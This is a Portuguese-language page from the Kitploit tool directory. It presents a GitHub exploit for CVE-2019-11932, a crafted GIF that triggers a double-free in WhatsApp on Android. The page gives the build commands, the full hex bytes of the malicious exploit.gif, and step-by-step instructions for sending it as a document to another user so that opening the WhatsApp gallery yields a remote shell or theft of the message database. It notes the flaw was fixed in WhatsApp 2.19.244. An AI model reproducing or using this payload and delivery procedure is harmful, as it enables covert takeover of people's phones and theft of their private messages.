Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-11932 — Programa para hackear WhatsApp através de GIF, fazendo um exploit com a porta. | Kitploit
Ferramentas/GitHubGitHub/fastmo/cve-2019-11932
Segurança AndroidGeração de PayloadsAnálise de VulnerabilidadesExploraçãoSegurança MóvelFerramenta de Acesso RemotoExploração de Binários
GitHubfastmo/cve-2019-11932

CVE-2019-11932

Programa para hackear WhatsApp através de GIF, fazendo um exploit com a porta.

Ver Repositório
1711há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-11932

O endereço do sistema () e o gadget devem ser substituídos pelo endereço real encontrado por uma vulnerabilidade de divulgação de informações.

Após substituir o endereço do sistema () e o gadget. Execute o código para gerar o arquivo GIF danificado:

root@kitploit:~
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 01 C7 C1 0C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

Em seguida, copie o arquivo exploit.gif e envie-o como Documento com WhatsApp para outro usuário do WhatsApp. Lembre-se de que não deve ser enviado como um arquivo de mídia, caso contrário, o WhatsApp tenta convertê-lo em MP4 antes de enviá-lo. Assim que o usuário receber o arquivo GIF malicioso, nada acontecerá até que o usuário abra a Galeria do WhatsApp para enviar um arquivo de mídia para seu amigo.

#Instruções

Vetores de ataque GIF do WhatsApp (Mini notícia e Instruções no Final)

root@kitploit:~
                              -----Mini Notícia e Instruções----

O hack do GIF do WhatsApp pode ser executado de duas maneiras

Estágio de privilégio local (de um aplicativo de usuário para o WhatsApp): um aplicativo malicioso é instalado no dispositivo Android. O aplicativo coleta endereços de bibliotecas zygote e cria um arquivo GIF malicioso que resulta na execução de código no WhatsApp. Isso permite que o aplicativo de malware roube arquivos da sandbox do WhatsApp, incluindo o banco de dados de mensagens. Execução remota de código: emparelhamento com um aplicativo que possui uma vulnerabilidade de divulgação de informações de memória remota. O atacante pode coletar os endereços das bibliotecas zygote e criar um arquivo GIF malicioso para enviar ao usuário através do WhatsApp (deve ser como um anexo, não como uma imagem através do Seletor de Galeria, pois o WhatsApp tenta converter arquivos de mídia em MP4 e isso tornaria seu GIF malicioso inútil). Assim que o usuário abrir a visualização da Galeria no WhatsApp, o arquivo GIF acionará um shell remoto no contexto do WhatsApp. Você deve ler: 4 hacks do Fitbit que você nunca conheceu antes WhatsApp no Android mais recente é hackeável As versões Android 8.1 e 9.0 são exploráveis, enquanto versões anteriores não são. O pesquisador diz que o erro de dupla liberação ainda poderia ser ativado em versões anteriores do sistema operacional, mas ocorre uma falha antes que um código malicioso possa ser executado para realizar um RCE. GIF malicioso que hackeia o WhatsApp Conclusão: O Facebook reconheceu o problema de segurança e corrigiu o problema na versão 2.19.244 do WhatsApp. Embora o Facebook tenha tentado fazer parecer que não é uma grande exploração, enquanto na realidade é bastante desagradável. Como sempre, mantenha seus aplicativos atualizados e não instale aplicativos desnecessários.

--------------------------------------------------------Passos---------------------------------------------------------------------------

Basta compilar o código neste repositório. O endereço do sistema () e o gadget devem ser substituídos pelo endereço real, encontrado por uma vulnerabilidade de divulgação de informações que você deve descobrir por conta própria usando outras técnicas antes que o GIF execute qualquer RCE para você. Assim que compilar o código mencionado no link acima, copie o conteúdo em um arquivo GIF e envie-o como Documento com WhatsApp para outro usuário do WhatsApp. Lembre-se de não enviá-lo como um arquivo de mídia, caso contrário, o WhatsApp tenta convertê-lo em MP4 antes de enviá-lo. Assim que o usuário receber o arquivo GIF malicioso, nada acontecerá até que o usuário abra a Galeria do WhatsApp para enviar um arquivo de mídia para seu amigo.

Baixar ferramenta